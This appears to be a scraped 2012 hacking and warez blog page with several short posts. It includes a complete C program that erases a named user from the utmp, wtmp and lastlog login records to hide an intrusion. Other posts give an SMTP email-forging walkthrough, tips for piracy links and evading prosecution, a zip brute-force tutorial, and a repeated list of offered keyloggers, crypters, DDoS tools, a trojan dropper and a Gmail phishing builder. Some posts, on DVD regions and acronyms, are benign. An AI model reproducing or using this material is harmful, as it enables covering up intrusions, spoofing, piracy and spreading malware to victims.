Welcome Guys

Free Links

Blog Archive

How To Download Directly From Crackdb.com

Written By websters on Friday, June 22, 2012 | 3:25 PM


Some of you may not know this, others may already knew it, however, because
of Sod rules which do no not allow indirect crack links, and because CrackDB
is a very good resource for cracks, i will show how to post links that lead
to a direct download from CrackDB.

The CrackDB server sends the archive of a crack as an attachment to the respond
for an HTTP request made by your browser, this means you (and your browser)
will never know the real location of the file, because of this you can't post a direct
link to the crack in your topic.

Using the Referer variable we can overcome this problem, but what referer to
use? if you used the domain name http://www.crackdb.com/
you will get nothing but a useless image file.

The correct refere is shown on your browser address bar. For example, if you
want the crack for IsoBuster Pro v1.6 you just type the name in the search box
and press Enter, the next page displays a list of items that match or nearly
match your search keywords, click on IsoBuster Pro v1.6 from the list and
you are now in the download page, the hyperlink named "Download" is the
link that initiates the request to the server to download the file, which looks
like this:

http://www.crackdb.com/x.php?id=12356


The referer is now displayed on your browser address bar, which looks like this:

http://www.crackdb.com/get.php?id=12356


Now, you use both links to refer to a direct crack download from CrackDB, like this
Fix:

http://www.crackdb.com/x.php?id=12356
Use this referer:
http://www.crackdb.com/get.php?id=12356


Any member now can copy & paste the links into his/her download manager and
start downloading immediatley.

I hope you find something usefull here. Thanx for reading this.
3:25 PM | 0 comments | Read More

Download Free Music legally


Are you scared that the RIAA is about to track you down for illegally downloading songs.
Well, here is a method of obtaining many songs absolutely free that is virtually untrackable
by modern technology. This has to do with capturing streaming audio, which in many cases, believe it or not
are plain old mp3s just waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp://www.windowsmedia.com . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left hand corner where there is an empty text box. This is the search box, just fill it with a songname or artist just like you would in kazaa and click search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just that...music, this is what you want. In many cases, this is all you need. Just right click on one of the links and click "save as" to save the song. This works if the file extension is .mp3 or .wma or .asf or well-other known formats. If this worked, you are finished, otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly like the above example and save the file locally. After the file is downloaded, check to see how large the file is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a textfile. You will then see many script commands that communicate to windows media player. Don't worry about these, just look for some URLs which will most likely be pointing to a .asf file. It will have at least one if not more. Open the new found URL in your browser and save it like in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it)

NOTE: If any of the URLs are preceded with "mms://" instead of "http://" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique which is manually recording streaming audio, with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort such as with "mms://" files. There is a degredation in quality compared to the other formats and it records every sound your PC makes while it is recording so don't chat on AIM while recording (lol I can hear random doors slamming now).
3:17 PM | 0 comments | Read More

Erasing Presence From System Logs


                                      ¤¤ Erasing Your Presence From System Logs ¤¤



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



Example:



#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

    struct utmp utmp_ent;



  if ((f=open(UTMP_NAME,O_RDWR))>=0) {

        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                          bzero((char *)&utmp_ent,sizeof( utmp_ent ));

                          lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

                          write (f, &utmp_ent, sizeof (utmp_ent));

                  }

        close(f);

  }

}



void kill_wtmp(who)

char *who;

{

    struct utmp utmp_ent;

    long pos;



    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {



        while(pos != -1L) {

           lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

           if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

                pos = -1L;

           } else {

                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                        bzero((char *)&utmp_ent,sizeof(struct utmp ));

                        lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

                        write (f, &utmp_ent, sizeof (utmp_ent));

                        pos = -1L;

                } else pos += 1L;

           }

        }

        close(f);

  }

}



void kill_lastlog(who)

char *who;

{

    struct passwd *pwd;

    struct lastlog newll;



        if ((pwd=getpwnam(who))!=NULL) {



           if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

                  bzero((char *)&newll,sizeof( newll ));

                  write(f, (char *)&newll, sizeof( newll ));

                  close(f);

           }



    } else printf("%s: ?\n",who);

}



main(argc,argv)

int argc;

char *argv[];

{

    if (argc==2) {

           kill_lastlog(argv[1]);

           kill_wtmp(argv[1]);

           kill_utmp(argv[1]);

           printf("Zap2!\n");

    } else

    printf("Error.\n");

}





                                                                                               

3:16 PM | 0 comments | Read More

Email Forge, sends email from anyone

 1. Some ISP's block port 25 so it might not work
2. Most likely, you won't be able to see what yer typing

First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.

Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):



code:--------------------------------------------------------------------------------
telnet mail.hotmail.com 25
--------------------------------------------------------------------------------


When yer connected type in (except what's in between *'s; you chose what will go in the []):

code:--------------------------------------------------------------------------------
helo
*wait*
mail from:[whoever]@[whoever.com]
*wait*
rcpt to:[whoever]@[whoever.com]
*wait*
data
*wait*
[write]
[whatever you want]
[in]
[as many]
[lines as wished]
.
*wait*
quit
--------------------------------------------------------------------------------


Helo is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.
3:12 PM | 0 comments | Read More

DVD Regions Information




The DVD region code identifies a DVD's compatibility with the players typically sold in a particular region.

The following graphic shows the approximate location of each region.



Region 0 (or "region free") is compatible with DVD players from any region.

The majority of all current titles play only in one specific region unless otherwise noted. DVDs sold by Amazon.co.uk are encoded for Region 2 or Region 0. Region 2 DVDs may not work on DVD players in other countries.

Region 1 DVDs sold by Marketplace sellers

Region 1 discs are intended for use with standard DVD players in North America (Canada and the USA). In most instances they can also be played on compatible "multi-region" DVD players (also known as "chipped" or "region-free" players).

They also require an NTSC-compatible television. NTSC is the standard picture format in North America, and differs from the PAL format adopted in Britain and Europe. Region 1 DVDs are usually presented in NTSC format, so you should ensure that your TV is capable of reading the NTSC signal before purchasing Region 1 DVDs.

Regional Coding Enhancement (RCE)

Regional Coding Enhancement (RCE) has been added by some film studios (specifically Warner and Columbia) to selected Region 1 DVDs, with the intention of preventing these discs from playing on some multi-region DVD players. We are therefore unable to guarantee that all Region 1 discs will be compatible with all multi-region players.

Global DVD region countries

This is not a definitive list and is intended only as a guide.

Region 1 - US, US Territories and Canada

      American Samoa, Canada, Guam, Palau, Mariana Islands, Marshall Islands, Puerto Rico, Micronesia, United States, U.S. Virgin Islands


Region 2 - UK, Europe, Japan, South Africa and Middle East

      Albania, Andorra, Austria, Bahrain, Belgium, Bosnia and Herzegovina, Bulgaria, Croatia, Czech Republic, Denmark, Egypt, Finland, France, Germany, Gibraltar, Greece, Greenland, Hungary, Iceland, Iran, Iraq, Ireland, Israel, Italy, Japan, Jordan, Kuwait, Lebanon, Liechtenstein, Luxembourg, Macedonia, Malta, Moldova, Monaco, Netherlands, Norway, Oman, Poland, Portugal, Qatar, Romania, San Marino, Saudi Arabia, Slovakia, Slovenia, South Africa, Spain, Sweden, Switzerland, Syria, United Arab Emirates, United Kingdom, Vatican City, Yemen, Yugoslavia


Region 3 - Southeast and East Asia

      Cambodia, Hong Kong, Indonesia, Laos, Malaysia, Myanmar, Phillipines, South Korea, Taiwan, Thailand, Vietnam


Region 4 - Australia, New Zealand, Central and South America

      Antigua, Argentina, Aruba, Australia, Bahamas, Barbados, Barbuda, Belize, Bolivia, Brazil, Chile, Colombia, Costa Rica, Cuba, Dominica, Dominican Republic, Ecuador, El Salvador, Falkland Islands, French Guiana, Grenada, Guatemala, Guyana, Haiti, Honduras, Jamaica, Mexico, New Guinea, New Zealand, Nicaragua, Panama, Paraguay, Peru, Suriname, Trinidad, Tobago, Uruguay


Region 5 - Former Soviet Union, Indian sub-continent, Africa, North Korea and Mongolia

      Afghanistan, Algeria, Angola, Bangladesh, Belarus, Benin, Botswana, Burkina Faso, Burundi, Cameroon, Cape Verde, Central African Republic, Chad, Comoros, Congo, Djibouti, Equatorial Guinea, Eritrea, Estonia, Ethiopia, Gabon, Gambia, Georgia, Ghana, Guinea, Guinea-Bissau, India, Ivory Coast, Kazakhstan, Kenya, Latvia, Lesotho, Liberia, Libya, Lithuania, Madagascar, Malawi, Mali, Mauritania, Mauritius, Mongolia, Morocco, Mozambique, Namibia, Niger, Nigeria, North Korea, Pakistan, Russia, Rwanda, Sao Tome and Principe, Senegal, Seychelles, Sierra Leone, Somalia, Sri Lanka, St. Helena, Sudan, Tanzania, Togo, Tunisia, Turkmenistan, Uganda, Ukraine, Uzbekistan, Zambia, Zimbabwe


Region 6 - China

      China


Region 7 - Reserved for future use

Region 8 - International Territories (ships, planes, etc)

3:08 PM | 0 comments | Read More

See Secure Sites



Fix the problem with seeing them secrue sites (banks or online stores) i found this very usefull to me at my work (isp backbone support lol, at the time i was regular support  )

Any way... what u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these



regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll


and save it as > all file types, and make it something like securefix.bat.

then just run the file and ur problem shuld be gone.
3:05 PM | 0 comments | Read More

Computer Acronyms

Written By websters on Thursday, June 21, 2012 | 9:32 PM

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Area Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB � MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology
9:32 PM | 0 comments | Read More

Hacking Downloads

Net Tools Includes Over 100 Tools





1 - PLAYSTATION EMULATOR -- You can play ps2 games on your pc with this utility,a very handy tool for gamers,its better than bleem in compatibility.

2 - Windows Admin Password Reset (Small Linux disk) -- Its a small linux image which can resets the admin password.

3 - RAPIDSHARE ACCOUNT CHECKER(New Mask Added) -- Title says it all.

4 - SQL FUZZER WITH VIDEO TUTORIAL(Only 1.5mb) -- Powerfull tool for sql injection.

5 - Ca0s SQL Perl Inj3ct0r v1 -- Good SQL injection tools source code.

6 - Milw0rm_Search_Utility_v1.0 by skyweb07 -- Small utility which can search exploits for you.

7 - Vaqxine Keylogger -- A very good tool by reputed member,it might not be FUD now but its a good tool.

8 - Hackers Tool Box -- Many handy tools.

9 - Nathans Image Worm -- It replaces every image on slave's pc with your defined image

10 - HTTP Recon 7.3 -- Use it know weather an exe is backdoored or not.Basically its for Fingerprinting and vulnerability analysis.

11 - JKymmel's Crypter -- For crypting you viruses.

12 - Icon changer -- Change the icon of any file

ANONIMITY TOOLS

13 - Proximitron -- It proxifies every program you use even the command prompt.

14 - RAT proxy -- A tool to proxify yourself.Full info. attached.

15 - Multi Proxy --Changes Your proxy on just one click or every few seconds.

16 - Jasager_Firmware_1.0 -- Its a Wifi MitM Tool for faking Your Access Point,it has lots of deadly features.

17 - Hide my windows installer -- Hides your running programs instantly

SECURITY TOOLS

18 - TrueCrypt Setup 6.2a -- It uses a powerfull encryption system used by government and agencies to encrypt your data.

19 - NortOn GoBack -- This tools has saved me lots of time from serious error,this is a must have tools,it can restore your pc to exact date and time.Its 1000 times better than system restore.

20 - Anti_keylogger_sheild_v3.0 -- Now you don't have to worry about keyloggers and stealers,very usefull to have.
VIRUS SCAN
Spoiler (Click to View)


21 - Process Explorer -- A utility for listing all the processes running.


REVERSE ENGINEERING TOOLS

22 - Resource Hacker -- A good tool for reverse engg.

23 - xvi32 -- A easy to use hexing tools.Very handy tool.

24 - PE.Explorer for Reverse engg. -- More advanced tool for hexing.


DDOS TOOLS

25 - ProDoS v1.0 -- Powerfull tool to ddos websites.Just like site hog

26 - Ddos any site in this WWW -- Title says it all.

27 - Site_Hog_v1 -- One of the most powerfull ddos tool.

28 - BFF DoS (Ping) v1.0 -- A good ddoser by BFF Productions

29 - zDoS -- Again a powerfull ddoser.

30 - Secret Downloader -- Makes your slave download a trojan and run it hidden.

NEWLY ADDED TOOLS

31 - MD5 CRACKER BY XDEMO -- A good md5 Cracker.

32 - PHISH GRABBER -- This tool will try to brute directories and files for the password log.In short it will hijack someone elses phishing log and their "hard work".
OCX and premade work list is included

33 - MASSIVE XXX PASSWORDS DUMP -- TITLE SAYS IT ALL

35 - KeyScrambler -- It encrypts all the keys you presses on the keyboard thereby protecting you from keyloggers,its a very usefull tool and it works great for me.

36 - FUD GMAIL HACKER -- Awesome tool to hack gmail passwords,just needed little social engg.It makes slave feel that he/she is hacking a gmail id.

VIRUS SCAN FOR GMAIL HACKER BUILDER
Spoiler (Click to View)

VIRUS SCAN FOR STUB
Spoiler (Click to View)


37 - VNC CLIENT FOR YOUR MOBILE -- A VNC Client for J2ME (Java 2 Mobile Edition)

*If you want any specific tool plz let me know. 
1 - PLAYSTATION EMULATOR -- You can play ps2 games on your pc with this utility,a very handy tool for gamers,its better than bleem in compatibility.

2 - Windows Admin Password Reset (Small Linux disk) -- Its a small linux image which can resets the admin password.

3 - RAPIDSHARE ACCOUNT CHECKER(New Mask Added) -- Title says it all.

4 - SQL FUZZER WITH VIDEO TUTORIAL(Only 1.5mb) -- Powerfull tool for sql injection.

5 - Ca0s SQL Perl Inj3ct0r v1 -- Good SQL injection tools source code.

6 - Milw0rm_Search_Utility_v1.0 by skyweb07 -- Small utility which can search exploits for you.

7 - Vaqxine Keylogger -- A very good tool by reputed member,it might not be FUD now but its a good tool.

8 - Hackers Tool Box -- Many handy tools.

9 - Nathans Image Worm -- It replaces every image on slave's pc with your defined image

10 - HTTP Recon 7.3 -- Use it know weather an exe is backdoored or not.Basically its for Fingerprinting and vulnerability analysis.

11 - JKymmel's Crypter -- For crypting you viruses.

12 - Icon changer -- Change the icon of any file

ANONIMITY TOOLS

13 - Proximitron -- It proxifies every program you use even the command prompt.

14 - RAT proxy -- A tool to proxify yourself.Full info. attached.

15 - Multi Proxy --Changes Your proxy on just one click or every few seconds.

16 - Jasager_Firmware_1.0 -- Its a Wifi MitM Tool for faking Your Access Point,it has lots of deadly features.

17 - Hide my windows installer -- Hides your running programs instantly

SECURITY TOOLS

18 - TrueCrypt Setup 6.2a -- It uses a powerfull encryption system used by government and agencies to encrypt your data.

19 - NortOn GoBack -- This tools has saved me lots of time from serious error,this is a must have tools,it can restore your pc to exact date and time.Its 1000 times better than system restore.

20 - Anti_keylogger_sheild_v3.0 -- Now you don't have to worry about keyloggers and stealers,very usefull to have.
VIRUS SCAN
Spoiler (Click to View)


21 - Process Explorer -- A utility for listing all the processes running.


REVERSE ENGINEERING TOOLS

22 - Resource Hacker -- A good tool for reverse engg.

23 - xvi32 -- A easy to use hexing tools.Very handy tool.

24 - PE.Explorer for Reverse engg. -- More advanced tool for hexing.


DDOS TOOLS

25 - ProDoS v1.0 -- Powerfull tool to ddos websites.Just like site hog

26 - Ddos any site in this WWW -- Title says it all.

27 - Site_Hog_v1 -- One of the most powerfull ddos tool.

28 - BFF DoS (Ping) v1.0 -- A good ddoser by BFF Productions

29 - zDoS -- Again a powerfull ddoser.

30 - Secret Downloader -- Makes your slave download a trojan and run it hidden.

NEWLY ADDED TOOLS

31 - MD5 CRACKER BY XDEMO -- A good md5 Cracker.

32 - PHISH GRABBER -- This tool will try to brute directories and files for the password log.In short it will hijack someone elses phishing log and their "hard work".
OCX and premade work list is included

33 - MASSIVE XXX PASSWORDS DUMP -- TITLE SAYS IT ALL

35 - KeyScrambler -- It encrypts all the keys you presses on the keyboard thereby protecting you from keyloggers,its a very usefull tool and it works great for me.

36 - FUD GMAIL HACKER -- Awesome tool to hack gmail passwords,just needed little social engg.It makes slave feel that he/she is hacking a gmail id.

VIRUS SCAN FOR GMAIL HACKER BUILDER
Spoiler (Click to View)

VIRUS SCAN FOR STUB
Spoiler (Click to View)


37 - VNC CLIENT FOR YOUR MOBILE -- A VNC Client for J2ME (Java 2 Mobile Edition)

*If you want any specific tool plz let me know. 
9:19 PM | 0 comments | Read More

Cracking Zip Password Files

Written By websters on Sunday, June 17, 2012 | 8:52 PM

Cracking Zip Password Files Tut On Cracking Zip Password Files.. What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com. FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.). FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil. The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC. FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information. FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password. Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit". We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack. If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method. Now that we've gone through all the theoretical stuff, let's get to the actual commands. -------------------------------------------------------------------------------- Bruteforce -------------------------------------------------------------------------------- The command line you'll need to use for using brute force is: fzc -mb -nzFile.zip -lChr Lenght -cType of chars Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too) For Chr Lenght you can use 4 kind of switches... -> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords -> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars -> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live... -> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option... For the Type of chars we have 5 switches they are: -> a for using lowercase letters -> A for using uppercase letters -> ! for using simbols (check the Bforce.txt if you want to see what simbols) -> s for using space -> 1 for using numbers Example: If you want to find a password with lowercase and numbers by brute force you would just do something like: fzc -mb -nzTest.zip -l4-7 -ca1 This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase. ***** hint ***** You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers. -------------------------------------------------------------------------------- Wordlis -------------------------------------------------------------------------------- Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too. To start a wordlist attak you'll do something like. fzc -mwMode number -nzFile.zip -nwWordlist Where: Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode. File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path. You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode. So if you something like fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+ FZC would just start reading at line 50 and would just read with length >= to 9. Example: If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do: fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50 -------------------------------------------------------------------------------- Resuming -------------------------------------------------------------------------------- Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too). To resume the bruteforce attack you just need to do: fzc -mr And the bruteforce attack will start from the place where it stopped when you pressed the ESC key. But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type fzc -mw3 -nzfile.zip -nwwordlist.txt -f100 Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session. Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program
8:52 PM | 0 comments | Read More